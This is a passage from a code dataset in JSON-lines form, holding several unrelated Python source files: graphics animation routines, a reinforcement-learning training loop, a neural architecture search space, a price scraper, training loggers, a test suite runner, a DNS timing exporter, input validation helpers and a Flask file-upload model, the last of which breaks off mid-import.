ctx.append_path(self.path)\n if a.border:\n ctx.set_line_width(a.border)\n basic.sources[a.mode_border](self, a.color3, 0)\n ctx.stroke_preserve()\n basic.sources[a.mode_fill](self, a.color1, 1)\n ctx.fill()\n pat = advanced.EndGroup(0.0, matrix2)\n basic.sources[a.mode_shadow](self, a.color4, 2)\n pat = advanced.Shadow(pat, a.shadow, a.shad_x, a.shad_y)\n ctx.identity_matrix()\n return pat\n\n def PaintReference(self, matrix=None):\n \"\"\"Draws the vector reference points, note that some transforms may not be possible\"\"\"\n ctx = video.cf.ctx\n if matrix:\n self.matrix = matrix\n else:\n self._UpdateMatrix()\n ctx.set_matrix(self.matrix)\n ctx.rectangle(*self.Box())\n ctx.set_source_rgba(1, 0, 1, 1)\n ctx.stroke()\n ctx.arc(0, 0, 4, 0, 6.283)\n ctx.set_source_rgba(0, 1, 0, 1)\n ctx.fill()\n ctx.set_source_rgba(0, 1, 1, 1)\n a = self.actual\n ctx.arc(a.org_x, a.org_y, 3, 0, 6.283)\n ctx.fill()\n ctx.identity_matrix()\n\n def Box(self):\n \"\"\"Returns the bounding box with 4 components (x,y, width, height), values\n relative to vector's 0,0 point (baseline). Not valid for deformed paths,\n in that case you should use ctx.path_extents\n \"\"\"\n o = self.original\n bord = self.actual.border\n return (\n -o._x_bearing - bord, -o._height - bord, o._x_bearing + o._width + bord * 2, o._height + o._descent + bord * 2)\n\n def Center(self):\n \"\"\"\n Returns a vector's center\n Relative to the screen\"\"\"\n x = self.actual.pos_x + self.original._width / 2.0\n y = self.actual.pos_y - self.original._height / 2.0\n return (x, y)\n\n def Move(self, from_, to, inter=common.i_lineal):\n \"\"\"\n Animates the movement from the `from` position to the `to` position\n\n :param from: (x,y)\n :param to: (x,y)\n \"\"\"\n self.actual.pos_x = common.Interpolate(self.progress, from_[0], to[0], inter)\n self.actual.pos_y = common.Interpolate(self.progress, from_[1], to[1], inter)\n\n def MoveTo(self, dx, dy, inter=common.i_lineal):\n \"\"\"Animates movement back to the original position -CHECK THIS-\n @dx, dy position relative to origin\n \"\"\"\n org = self.original\n px = org.pos_x\n py = org.pos_y\n self.Move((px, py), (dx + px, dy + py), inter)\n\n def MoveFrom(self, dx, dy, inter=common.i_lineal):\n \"\"\"Animates the movement of a vector to the given point from its original position\n @dx, dy final position\n \"\"\"\n org = self.original\n px = org.pos_x\n py = org.pos_y\n self.Move((px + dx, py + dy), (px, py), inter)\n\n def Fade(self, from_, to, inter=common.i_lineal):\n \"\"\"Animated fade of a vector\n @from_ float for initial value\n @to float for final value\n both of them [0-1]\n \"\"\"\n self.Alpha(common.Interpolate(self.progress, from_, to, inter))\n\n def Alpha(self, alpha):\n \"\"\"Specifies alpha, for all colors\n @alpha float value for alpha channel, [0-1]\n \"\"\"\n self.actual.color1.a = self.actual.color2.a = self.actual.color3.a = self.actual.color4.a = alpha\n\n def Rotate(self, from_, to, inter=common.i_lineal):\n \"\"\"Animates vector rotation\n @from_ initial angle, radians\n @to final angle, radians\n \"\"\"\n self.actual.angle = common.Interpolate(self.progress, from_, to, inter)\n\n def Scale(self, from_, to_, inter=common.i_lineal):\n \"\"\"Animates vector scaling\n @from_ initial scale\n @to_ final scale\n both of them are float, 1 is default, natural scale; >1 is bigger; <1 is smaller\n \"\"\"\n self.actual.scale_x = self.actual.scale_y = common.Interpolate(self.progress, from_, to_, inter)\n\n def Shake(self, amplitude=4):\n \"\"\"\n Creates a shake from the position\n @amplitude of the movement in pixels\n \"\"\"\n self.actual.pos_x = self.original.pos_x + common.Interpolate(self.progress, -amplitude, amplitude, common.i_rand)\n self.actual.pos_y = self.original.pos_y + common.Interpolate(self.progress, -amplitude, amplitude, common.i_rand)\n\n def Wiggle(self, amplitude=4, frequency=2):\n \"\"\"\n Movement between random points\n @amplitude of the movement in pixels\n @frequency number of points\n \"\"\"\n if self.pointsw is None:\n self.pointsw = []\n self.pointsw.append((0, 0))\n for i in range(frequency):\n randomx = common.LERP(random(), -amplitude, amplitude)\n randomy = common.LERP(random(), -amplitude, amplitude)\n self.pointsw.append((randomx, randomy))\n self.pointsw.append((0, 0))\n\n x, y = common.RanmaBezier(self.progress, self.pointsw)\n self.actual.pos_x = self.original.pos_x + x\n self.actual.pos_y = self.original.pos_y + y\n return (x, y)\n\n def LoadTexture(self, filename, part=PART_BORDER, extend=cairo.EXTEND_REPEAT):\n \"\"\"This loads texture for every drawing function\n @filename .png filename\n @part what is it for? (0=outline, 1=fill, 2=shadow, 3=particles)\n (or .PART_BORDER .PART_FILL .PART_SHADOW, .PART_PARTICULAS) <- TODO-CHECK THIS\n @extend type of extend for cairo\n \"\"\"\n t = LoadTexture(filename, extend)\n self.textures[part] = t\n self.MoveTexture(pos_x=0, pos_y=-self.original._ascent, part=part)\n a = self.actual\n o = self.original\n if part == self.PART_BORDER:\n o.mode_border = a.mode_border = self.P_TEXTURE\n elif part == self.PART_FILL:\n o.mode_fill = a.mode_fill = self.P_TEXTURE\n elif part == self.PART_SHADOW:\n o.mode_shadow = a.mode_shadow = self.P_TEXTURE\n elif part == self.PART_PARTICLE:\n o.mode_particle = a.mode_particle = self.P_TEXTURE\n\n def MoveTexture(self, pos_x, pos_y, org_x=0, org_y=0, angle=0, scale_x=1, scale_y=1, part=0):\n self.textures[part].set_matrix(CreateMatrix(pos_x, pos_y, org_x, org_y, angle, scale_x, scale_y, inverse=True))\n\n def CreateParticles(self, texture=None, scale=1.0, alpha_min=0.2, vertical=True, mode=0):\n \"\"\"Extremely SLOW\n parameters\n @texture -> pattern with the texture\n optional\n @scale=1.0 -> scale wanted\n @alpha_min=0.2 -> minimum alpha threshold [0-255] <- TODO- CHECK THIS\n @vertical=True -> boolean, sets order for particle creation, True = Vertical, False = Horizontal\n @mode=0 -> particle mode\n \"\"\"\n if not texture:\n texture = self.textures[3]\n x1, y1, x2, y2 = map(int, self.Box())\n a = self.actual\n x1 += int(a.pos_x - a.border)\n x2 += int(a.pos_x + a.border)\n y1 += int(a.pos_y - a.border)\n y2 += int(a.pos_y + a.border)\n box = (\n x1, y1, x2, y2)\n advanced.StartGroup()\n self.Paint()\n parts = advanced.CreateParticles(box, texture, scale, alpha_min, vertical, mode)\n advanced.EndGroup(opacity=0.0)\n return parts\n\n def PaintReflection(self, height=None):\n \"\"\"@height : pixel height for gradient, etc\"\"\"\n posy = self.actual.pos_y\n alto_linea = self.original._line_height\n descent = self.original._descent\n height = height or self.original._height\n advanced.StartGroup()\n self.Paint()\n advanced.fBlur()\n mt = CreateMatrix(org_y=posy - self.actual.org_y, pos_y=posy + alto_linea + descent, scale_y=-1)\n pat = advanced.EndGroup(0.0, matrix=mt)\n video.cf.ctx.set_source(pat)\n lineal = cairo.LinearGradient(0, posy + height, 0, posy + height * 2.0)\n lineal.add_color_stop_rgba(1, 0, 0, 0, 0)\n lineal.add_color_stop_rgba(0, 1, 1, 1, 1)\n video.cf.ctx.mask(lineal)\n\n\ndef DemultipyAlpha(b, g, r, a):\n \"\"\"\n @b, g, r, a\n Todos los valores de 0 a 255\"\"\"\n return (\n Demult(b, a), Demult(g, a), Demult(r, a), a)\n\n\ndef D1(x):\n return x / 255.0\n\n\ndef D2(x):\n return (x + 0.5) / 256.0\n\n\ndef Demult(x, a):\n return common.ClampB(int((x * a - 1) / 254))\n\n\ndef DuplicateSurface(surface):\n vi = video.vi\n sfc2 = surface.create_similar(cairo.CONTENT_COLOR_ALPHA, vi.width, vi.height)\n ctx2 = cairo.Context(sfc2)\n ctx2.set_source_surface(surface)\n ctx2.set_operator(cairo.OPERATOR_SOURCE)\n ctx2.paint()\n return sfc2\n\n\ndef CopyTarget():\n return DuplicateSurface(video.cf.ctx.get_group_target())","sub_path":"pycfiles/kafx-1.6.2-py2.7/extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":27943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"634226512","text":"from __future__ import division\nfrom setproctitle import setproctitle as ptitle\nimport torch\nimport torch.optim as optim\nfrom environment import *\nfrom utils import ensure_shared_grads, EspTracker\nfrom models.models import *\nfrom player_util import Agent\nfrom torch.autograd import Variable\nfrom Utils.Logger import Logger\n\nimport numpy as np\nimport time\n\ndef train (rank, args, shared_model, optimizer, env_conf, datasets=None):\n if args.deploy:\n return\n ptitle('Train {0}: {1}'.format(args.env, rank))\n print ('Start training agent: ', rank)\n \n if rank == 0:\n logger = Logger (args.log_dir [:-1] + '_losses/')\n train_step = 0\n\n gpu_id = args.gpu_ids[rank % len(args.gpu_ids)]\n env_conf [\"env_gpu\"] = gpu_id\n torch.manual_seed(args.seed + rank)\n if gpu_id >= 0:\n torch.cuda.manual_seed(args.seed + rank)\n\n raw_list, gt_lbl_list = datasets\n env = EM_env (raw_list, env_conf, type=\"train\", gt_lbl_list=gt_lbl_list, seed=args.seed + rank)\n\n if optimizer is None:\n if args.optimizer == 'RMSprop':\n optimizer = optim.RMSprop (shared_model.parameters (), lr=args.lr)\n if args.optimizer == 'Adam':\n optimizer = optim.Adam (shared_model.parameters (), lr=args.lr, amsgrad=args.amsgrad)\n\n player = Agent (None, env, args, None)\n player.gpu_id = gpu_id\n player.model = get_model (args, args.model, env.observation_space.shape, args.features, \n atrous_rates=args.atr_rate, num_actions=2, split=args.data_channel, gpu_id=gpu_id, multi=args.multi)\n player.state = player.env.reset ()\n player.state = torch.from_numpy (player.state).float ()\n\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.state = player.state.cuda ()\n player.model = player.model.cuda ()\n player.model.train ()\n\n if rank == 0:\n eps_reward = 0\n pinned_eps_reward = 0\n\n while True:\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.model.load_state_dict (shared_model.state_dict ())\n else:\n player.model.load_state_dict (shared_model.state_dict ())\n \n if player.done:\n player.eps_len = 0\n\n if rank == 0:\n if train_step % args.train_log_period == 0 and train_step > 0:\n print (\"train: step\", train_step, \"\\teps_reward\", eps_reward)\n if train_step > 0:\n pinned_eps_reward = player.env.sum_reward.mean ()\n eps_reward = 0\n\n if args.lstm_feats:\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.cx, player.hx = player.model.lstm.init_hidden (batch_size=1, use_cuda=True)\n else:\n player.cx, player.hx = player.model.lstm.init_hidden (batch_size=1, use_cuda=False)\n elif args.lstm_feats:\n player.cx = Variable (player.cx.data)\n player.hx = Variable (player.hx.data)\n\n for step in range(args.num_steps):\n \n if rank < args.lbl_agents:\n player.action_train (use_lbl=True) \n else:\n player.action_train () \n\n if rank == 0:\n eps_reward = player.env.sum_reward.mean ()\n if player.done:\n break\n\n if player.done:\n state = player.env.reset (player.model, gpu_id)\n player.state = torch.from_numpy (state).float ()\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.state = player.state.cuda ()\n\n R = torch.zeros (1, 1, env_conf [\"size\"][0], env_conf [\"size\"][1])\n if args.lowres:\n R = torch.zeros (1, 1, env_conf [\"size\"][0] // 2, env_conf [\"size\"][1] // 2)\n\n if not player.done:\n if args.lstm_feats:\n value, _, _ = player.model((Variable(player.state.unsqueeze(0)), (player.hx, player.cx)))\n else:\n value, _ = player.model(Variable(player.state.unsqueeze(0)))\n R = value.data\n\n if gpu_id >= 0:\n with torch.cuda.device(gpu_id):\n R = R.cuda()\n\n player.values.append(Variable(R))\n policy_loss = 0\n value_loss = 0\n \n gae = torch.zeros(1, 1, env_conf [\"size\"][0], env_conf [\"size\"][1])\n if args.lowres:\n gae = torch.zeros (1, 1, env_conf [\"size\"][0] // 2, env_conf [\"size\"][1] // 2)\n if gpu_id >= 0:\n with torch.cuda.device(gpu_id):\n gae = gae.cuda()\n R = Variable(R)\n\n for i in reversed(range(len(player.rewards))):\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n reward_i = torch.tensor (player.rewards [i]).cuda ()\n else:\n reward_i = torch.tensor (player.rewards [i])\n\n R = args.gamma * R + reward_i\n advantage = R - player.values[i]\n value_loss = value_loss + (0.5 * advantage * advantage).mean ()\n delta_t = player.values[i + 1].data * args.gamma + reward_i - player.values[i].data\n gae = gae * args.gamma * args.tau + delta_t\n if args.noisy:\n policy_loss = policy_loss - \\\n (player.log_probs[i] * Variable(gae)).mean ()\n else: \n policy_loss = policy_loss - \\\n (player.log_probs[i] * Variable(gae)).mean () - \\\n (args.entropy_alpha * player.entropies[i]).mean ()\n\n\n player.model.zero_grad ()\n sum_loss = (policy_loss + value_loss)\n\n sum_loss.backward ()\n ensure_shared_grads (player.model, shared_model, gpu=gpu_id >= 0)\n optimizer.step ()\n player.clear_actions ()\n\n if rank == 0:\n train_step += 1\n if train_step % args.log_period == 0 and train_step > 0:\n log_info = {\n 'train: value_loss': value_loss, \n 'train: policy_loss': policy_loss, \n 'train: eps reward': pinned_eps_reward,\n }\n\n if \"EX\" in args.model:\n log_info [\"cell_prob_loss\"] = cell_prob_loss\n\n for tag, value in log_info.items ():\n logger.scalar_summary (tag, value, train_step)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"513976342","text":"import tensorflow as tf\n\nfrom deephyper.search.nas.model.baseline.util.struct import (create_seq_struct,\n create_struct_full_skipco)\nfrom deephyper.search.nas.model.space.block import Block\nfrom deephyper.search.nas.model.space.cell import Cell\nfrom deephyper.search.nas.model.space.node import Node\nfrom deephyper.search.nas.model.space.op.basic import Connect\nfrom deephyper.search.nas.model.space.op.op1d import (Conv1D, Dense, Identity,\n MaxPooling1D,\n dropout_ops)\n\n\ndef create_cell_1(input_nodes):\n \"\"\"Create a cell with convolution.\n\n Args:\n input_nodes (list(Node)): a list of input_nodes for this cell.\n\n Returns:\n Cell: the corresponding cell.\n \"\"\"\n cell = Cell(input_nodes)\n\n def create_conv_block(input_nodes):\n # first node of block\n n1 = Node('N1')\n for inpt in input_nodes:\n n1.add_op(Connect(cell.graph, inpt, n1))\n\n def create_conv_node(name):\n n = Node(name)\n n.add_op(Identity())\n n.add_op(Conv1D(filter_size=3, num_filters=16))\n n.add_op(Conv1D(filter_size=5, num_filters=16))\n n.add_op(MaxPooling1D(pool_size=3, padding='same'))\n n.add_op(MaxPooling1D(pool_size=5, padding='same'))\n return n\n # second node of block\n n2 = create_conv_node('N2')\n\n n3 = create_conv_node('N3')\n\n block = Block()\n block.add_node(n1)\n block.add_node(n2)\n block.add_node(n3)\n\n block.add_edge(n1, n2)\n block.add_edge(n2, n3)\n return block\n\n block1 = create_conv_block(input_nodes)\n block2 = create_conv_block(input_nodes)\n block3 = create_conv_block(input_nodes)\n\n cell.add_block(block1)\n cell.add_block(block2)\n cell.add_block(block3)\n\n cell.set_outputs()\n return cell\n\ndef create_structure(input_shape=(2,), output_shape=(1,), num_cells=2):\n return create_struct_full_skipco(\n input_shape,\n output_shape,\n create_cell_1,\n num_cells)\n","sub_path":"candlepb/Combo/models/candle_conv_mlp_1.py","file_name":"candle_conv_mlp_1.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"137890247","text":"import requests\nfrom bs4 import BeautifulSoup\n\nrequest = requests.get('https://www.amazon.com/gp/product/B01F64QL7K/')\ncontent = request.content\nsoup = BeautifulSoup(content, \"html.parser\")\nelement = soup.find(\"span\", {\"id\": \"priceblock_ourprice\"})\nstring_price = element.text.strip()\nprice_without_symbol = string_price[1:]\n\nprice = float(price_without_symbol)\n\nif price < 70:\n print(\"The price has lowered from your purchase price. Contact costumer service for a refund of the difference.\")\nelse:\n print(\"The price is the same or higher than when you purchased. Be happy you purchased when you did.\")\n\nprint(\"The current price is {}.\".format(string_price))\n# $74.99\n\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"83856110","text":"\"\"\" Tensorboard interface to enable logging of MDRNN/VAE training data \"\"\"\n# Copyright (c) 2020, - All Rights Reserved\n# This file is part of the Evolutionary Planning on a Learned World Model thesis.\n# Unauthorized copying of this file, via any medium is strictly prohibited without the consensus of the authors.\n# Written by Thor V.A.N. Olesen & Dennis T.T. Nguyen .\nimport io\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom torchvision.utils import make_grid\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utility.logging.base_logger import BaseLogger\n\n\nclass ModelTrainingLogger(BaseLogger):\n\n def __init__(self, is_logging):\n super().__init__(is_logging)\n self._test_writer = None\n self._train_writer = None\n self.start_time = None\n\n def start_log_training(self, name, model, dataloader, save_input_image=True):\n if not self._is_logging:\n return\n dataiter = iter(dataloader)\n frames = dataiter.next()\n self.start_log(name)\n if save_input_image:\n grid_of_images = make_grid(frames)\n self._train_writer.add_image(tag=f'{name}_training_input_example', img_tensor=grid_of_images, global_step=0)\n self._train_writer.add_graph(model, frames)\n self.start_time = time.time()\n\n def start_log_training_minimal(self, name, is_vae=False):\n if not self._is_logging:\n return\n self.start_log(name, is_vae)\n self.start_time = time.time()\n\n def log_average_loss_per_epoch(self, name, loss, epoch, is_train):\n\n title = f\"{name} - Average Total Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_reward_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - Reward MSE Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_baseline_reward_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - Reward Baseline MSE Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_terminal_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - Terminals BCE Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_next_latent_loss_per_epoch(self, name, loss, epoch, is_train):\n title = f\"{name} - GMM next latent Loss/per_epoch\"\n self.log_train_test(title, loss, epoch, is_train)\n\n def log_average_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Average Total Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_reward_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Reward MSE Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_baseline_reward_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Reward Baseline MSE Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_reward_baseline_value(self, name, model, baseline_reward, num_files):\n self._train_writer.add_text(tag=f'{name} - baseline_reward/{model}', text_string=f'Baseline reward: {baseline_reward}\\n'\n f'Reward count: {num_files}\\n')\n\n def log_reward_baseline_losses(self, name, model, train_loss, test_loss):\n self._train_writer.add_text(tag=f'{name} - baseline_reward/{model}', text_string=f'Baseline train loss: {train_loss}\\n'\n f'Baseline test loss: {test_loss}')\n\n def log_terminal_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - Terminals BCE Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_next_latent_loss_per_batch(self, name, loss, batch, is_train):\n title = f\"{name} - GMM next latent Loss/per_batch\"\n self.log_train_test(title, loss, batch, is_train)\n\n def log_vae_random_constructions(self, images, epoch):\n if not self._is_logging:\n return\n grid = make_grid(images)\n self._test_writer.add_image(f'vae_random_latent_vectors_construction', grid, global_step=epoch)\n\n def log_vae_reconsstructions(self, targets, predictions, epoch, is_train):\n if not self._is_logging:\n return\n target_grid = make_grid(targets)\n predictions = make_grid(predictions)\n\n if is_train:\n self._train_writer.add_image(f'vae_reconstructions/train_targets', target_grid, global_step=epoch)\n self._train_writer.add_image(f'vae_reconstructions/train_predictions', predictions, global_step=epoch)\n else:\n self._test_writer.add_image(f'vae_reconstructions/test_targets', target_grid, global_step=epoch)\n self._test_writer.add_image(f'vae_reconstructions/test_predictions', predictions, global_step=epoch)\n\n def log_train_test(self, tag, loss, epoch, is_train):\n if not self._is_logging:\n return\n if is_train:\n self._train_writer.add_scalar(tag, loss, epoch)\n else:\n self._test_writer.add_scalar(tag, loss, epoch)\n\n def log_batch_sample(self, samples, batch_idx, is_train):\n # Save the plot to a PNG in memory and prevent display\n image = self._make_batch_image_grid(samples)\n if is_train:\n self._train_writer.add_image(f\"Batch_train_samples\", image, dataformats='HWC', global_step=batch_idx)\n else:\n self._test_writer.add_image(f\"Batch_test_samples\", image, dataformats='HWC', global_step=batch_idx)\n self.commit_log()\n\n def _make_batch_image_grid(self, samples):\n current_frame_subplot = 1\n num_samples = len(samples['input_frames'])\n\n figure = plt.figure(figsize=(15, 15))\n for i in range(num_samples):\n self._add_to_image_grid('Input\\n'\n f'action: {list(samples[\"input_actions\"][i])}\\n', current_frame_subplot, samples['input_frames'][i], num_samples)\n current_frame_subplot += 1\n self._add_to_image_grid(f'Prediction\\n'\n f'reward_pred: {samples[\"pred_rewards\"][i].item()}\\n'\n f'terminal_pred: {samples[\"pred_terminals\"][i].item()}',\n current_frame_subplot, samples['pred_frames'][i], num_samples)\n current_frame_subplot += 1\n self._add_to_image_grid('Target\\n'\n f'reward_target: {samples[\"target_rewards\"][i].item()}\\n'\n f'terminal_target: {samples[\"target_terminals\"][i].item()}', current_frame_subplot, samples['target_frames'][i], num_samples)\n current_frame_subplot += 1\n\n return self._plot_to_image(figure)\n\n def _plot_to_image(self, figure):\n # Save the plot to a PNG in memory.\n buf = io.BytesIO()\n plt.savefig(buf, format='png')\n plt.close(figure)\n buf.seek(0)\n pil_img = Image.open(buf).convert('RGB')\n image = np.array(pil_img)\n return image\n\n def _add_to_image_grid(self, title, index, image, num_samples):\n plt.subplot(num_samples, 3, index, title=title) # 3 = input, pred, target\n plt.xticks([])\n plt.yticks([])\n plt.grid(False)\n plt.imshow(image)\n\n def end_log_training(self, name):\n if not self._is_logging:\n return\n elapsed_time = (time.time() - self.start_time)/60\n self._test_writer.add_text(tag=f'{name} - Total train time', text_string=f'Minutes: {elapsed_time}')\n self.end_log()\n\n def start_log(self, name, is_vae=False):\n if not self._is_logging:\n return\n self._test_writer = SummaryWriter(log_dir=f'{self.log_dir_root}/test/{name}')\n self._train_writer = SummaryWriter(log_dir=f'{self.log_dir_root}/train/{name}')\n\n def commit_log(self):\n if not self._is_logging:\n return\n self._train_writer.flush()\n self._test_writer.flush()\n\n def end_log(self):\n if not self._is_logging:\n return\n self.commit_log()\n self._train_writer.close()\n self._test_writer.close()\n","sub_path":"utility/logging/model_training_logger.py","file_name":"model_training_logger.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181394741","text":"#!/usr/bin/env python3\n#\n# Copyright 2018 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport unittest\n\nfrom tests.controllers.sl4a_lib import rpc_client_test\nfrom tests.controllers.sl4a_lib import rpc_connection_test\nfrom tests.controllers.sl4a_lib import sl4a_manager_test\nfrom tests.controllers.sl4a_lib import sl4a_session_test\n\n\ndef compile_suite():\n test_classes_to_run = [\n rpc_client_test.RpcClientTest,\n rpc_connection_test.RpcConnectionTest,\n sl4a_manager_test.Sl4aManagerFactoryTest,\n sl4a_manager_test.Sl4aManagerTest,\n sl4a_session_test.Sl4aSessionTest,\n ]\n loader = unittest.TestLoader()\n\n suites_list = []\n for test_class in test_classes_to_run:\n suite = loader.loadTestsFromTestCase(test_class)\n suites_list.append(suite)\n\n big_suite = unittest.TestSuite(suites_list)\n return big_suite\n\n\nif __name__ == \"__main__\":\n # This is the entry point for running all SL4A Lib unit tests.\n runner = unittest.TextTestRunner()\n results = runner.run(compile_suite())\n sys.exit(not results.wasSuccessful())\n","sub_path":"tools/test/connectivity/acts/framework/tests/controllers/sl4a_lib/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"406744666","text":"#! /usr/bin/env python\n\nfrom prometheus_client import start_http_server, Gauge\nimport dns.resolver\nimport time\n\n# ns_target can be a public resolver or authoritative nameserver\nns_target = '8.8.8.8'\nquery_target = 'tools.jcdev.org'\n\nresolver = dns.resolver.Resolver()\nresolver.nameservers = [ns_target]\n\nquery_time = Gauge('query_time_seconds', 'DNS query total time taken', ['hostname'])\n\ndef dns_timer():\n stime = time.time()\n answers = resolver.query(query_target, 'A')\n etime = time.time()\n\n query_time.labels(query_target).set(etime - stime)\n time.sleep(30)\n\nif __name__ == '__main__':\n start_http_server(9181)\n while True:\n dns_timer()\n","sub_path":"dns-exporter.py","file_name":"dns-exporter.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"423674260","text":"# RUTIINEJA TIETOJEN KYSYMISEKSI KÄYTTÄJÄLTÄ\n\n# Kirjastojen ja modulien lataukset\nimport sanity2\n\n# Funktioden määrittelyt\ndef kysy_liukuluku(kysymys, alaraja, ylaraja):\n \"\"\"Kysyy käyttäjä liukuluvun tai kokonaisluvun ja tarkistaa syötteen oikean tietotyypin ja suuruuden\n\n Args:\n kysymys (str): Käyttäjälle esitettävä kysymys\n alaraja (float): pienin sallittu arvo\n ylaraja (float): suurin sallittu arvo\n\n Returns:\n float: käyttäjän syöttämä arvo liukulukuna\n \"\"\"\n # Kysytään käyttäjältä tietoa, kunnes saadaan järkevä arvo\n luku = 0\n tapahtui_virhe = True\n\n while tapahtui_virhe == True:\n\n # Esitetään parametrina annettu kysymys ja tallennetaan vastaus (merkkijono) muuttujaan\n vastaus_str = input(kysymys + ' ')\n\n # Tarkistetaan syötteen järkevyys, virhetiedot ja arvo tallennetaan listamuuttujaan tulokset\n tulokset = sanity2.liukuluvuksi(vastaus_str)\n\n # Katsotaan onko virhekoodi 0, ja tallennetaan arvo muuttujaan vastaus\n if tulokset[0] == 0:\n vastaus = tulokset[2]\n\n # Tehdään raja-arvotarkistus, virhetiedot muuttujaan tarkistusviesti\n tarkistusviesti = sanity2.rajatarkistus(vastaus, alaraja, ylaraja)\n \n # Katsotaan onko arvo sallittujen rajojen sisällä tutkimalla virhekoodia\n if tarkistusviesti[0] == 0:\n tapahtui_virhe = False\n luku = vastaus\n\n else:\n # Jos raja-arvotarkistuksen virhekoodi ei ole 0, tulostetaan virheilmoitus\n print(tarkistusviesti[1])\n\n # Jos liukulukutarkistuksen virhekoodi ei ole 0, tulostetaan virheilmoitus \n else:\n print(tulokset[1])\n\n return luku\n\n\n# Koodauksen aikaiset tilapaistestit\nif __name__ == '__main__':\n vastaus = kysy_liukuluku('Anna luku', 100, 200)\n print(vastaus)\n \n","sub_path":"kysymys.py","file_name":"kysymys.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"576251183","text":"from db import db\nfrom flask import send_file\nfrom datetime import datetime\nfrom models.asignatura import Asignatura\nimport mongoengine_goodjson as gj\nimport os\nfrom werkzeug.utils import secure_filename\n\n\nclass Archivo(gj.Document):\n nombre = db.StringField(verbose_name=\"Nombre Archivo\", max_length=200)\n path = db.StringField(verbose_name=\"Path\", max_length=200)\n asignatura = db.ReferenceField(Asignatura)\n fecha = db.DateTimeField(default=datetime.now)\n meta = {'strict': False}\n\n def __str__(self):\n return self.nombre\n\n def to_dict(self):\n return {\n \"id\": str(self.id),\n \"nombre\": self.nombre,\n \"path\": self.path,\n \"asignatura\": self.asignatura.to_dict(),\n \"fecha\": self.fecha.strftime(\"%Y/%m/%d %H:%M:%S\")\n }\n\n # literal los class method son los services en java\n @classmethod\n def upload(cls, base_path, new_file, asignatura_id):\n asignatura = Asignatura.objects(id=asignatura_id).first()\n folder = base_path + str(asignatura['id'])\n if not os.path.exists(folder):\n os.mkdir(folder)\n file_name = secure_filename(new_file.filename)\n path = os.path.join(folder, file_name)\n new_file.save(path)\n if os.path.exists(path):\n archivo = Archivo(nombre=file_name, path=path,\n asignatura=asignatura)\n archivo.save()\n return archivo.to_dict()\n \n @classmethod\n def get_all_by_asignatura(cls, asignatura_id):\n archivos = Archivo.objects(asignatura = asignatura_id).all()\n result_list=[]\n for archivo in archivos:\n result_list.append(archivo.to_dict())\n return result_list\n\n @classmethod\n def download(cls, archivo_id):\n archivo = Archivo.objects(id=archivo_id).first()\n print(60*\"*\", archivo.path)\n return send_file(archivo.path, as_attachment=True, attachment_filename=archivo.nombre + \"\")\n\n @classmethod\n def erase(cls, archivo_id):\n try:\n archivo = Archivo.objects(id=archivo_id).first()\n os.remove(archivo.path)\n archivo.delete()\n return \"Archivo eliminado\"\n except Exception as e:\n print(str(e))\n return \"No se pudo eliminar el archivo\"\n \n @classmethod\n def get_all(cls):\n archivos = Archivo.objects().all()\n result_list = []\n for archivo in archivos:\n result_list.append(archivo.to_dict())\n return result_list","sub_path":"models/archivo.py","file_name":"archivo.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"646244686","text":"from inferelator import utils\nfrom inferelator import workflow\nfrom inferelator.distributed.inferelator_mp import MPControl\nfrom inferelator.preprocessing import single_cell\nfrom 